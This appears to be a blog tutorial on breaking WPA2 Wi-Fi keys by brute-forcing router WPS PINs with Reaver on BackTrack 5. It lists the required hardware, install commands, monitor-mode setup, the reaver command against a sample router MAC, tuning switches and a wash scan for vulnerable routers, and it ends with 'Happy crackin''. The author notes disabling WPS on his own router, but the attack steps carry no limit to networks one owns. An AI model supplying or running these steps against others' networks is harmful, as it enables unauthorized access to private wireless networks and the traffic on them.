backtrack, bt

How to break WPA2 key with Reaver WPS Attack

When routers are enabled with WPS (aka Wi-Fi Protected) they are anything but “protected”, the way WPS works is by a eight digit key exchange between device and router. The key exchange is not encrypted and can be “brute forced” exposing the WPA or WPA2 wireless encryption key.

WPS lets you use push buttons or PINS instead of entering a network name (SSID) and a wireless security key by hand.

With the right hardware and software, this attack can be setup in minutes and take no more than a day to expose the key, or in my case just set and forget until the next morning.

I bought a new router and changed the firmware to DD-WRT so I could turn this “feature” off, it doesn’t matter how strong your WPA key is, it comes down to a eight digit string.

One important note to take from this is that once you find out the eight digit key from the router, if the WPA key is changed on the router it can be cracked in seconds as the WPS PIN doesn’t change.

To successfully do this, you will need the following:

  1. BackTrack 5 R3
  2. ALFA USB Wifi AWUSO36NHAAWUS036NHA
  3. Reaver

Reaver comes with Backtrack 5 R3, the ALFA USB Wifi adapter is not “needed” but if you don’t have a compatible wireless adapter to use in BackTrack you might be unsuccessful.

If you want to run Reaver without it being on BackTrack, install it using the following commands:

Run all commands without the “#” at the front

  1. #apt-get update
  2. #apt-get upgrade
  3. #apt-get install reaver aircrack-ng

To tweak the attack with switches you can run “reaver” which will output the following:reaver help

  1. Shell into BackTrack 5
  2. #su – rootSwitch User
  3. #iwconfigiwconfig
  4. #airmon-ng start wlan0airmon-ng start
  5. #airodump-ng mon0airodump
  6. #reaver -i mon0 -b 01:AA:02:CC:03:DD -vvreaver attack in progress
  7. Result! (I reused the pin from an old succesful attempt)result

Diagnosing the problem(s) can be helped by using the –vv switch, it will show you step by step what the current action and result is.

If you are getting unexpected results, I highly suggest using the following switches:

  • -d 5 (add a delay to allow the router to recover)
  • -w (act as a Windows 7 operating system)
  • -c ## (lock to the actual channel of the router to prevent channel bouncing)
  • -a (auto detect the best advanced settings to use on the router)
  • –dh-small (instructs Reaver to use small diffie-hellman secret numbers to reduce the load on the router)

To scan all routers to see if they are vulnerable you can run the following command:

  1. #wash -i mon0wash

The whole process can take between 4-10 hours unless you are lucky and the router has a “default” PIN, which Reaver will try first.

Happy crackin’

Should you have any questions, comments or suggestions, please don’t hesitate to comment below. If you like what you have read, please share it on your favourite social media medium.

Leave a Reply

Your email address will not be published. Required fields are marked *


three × = 9

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>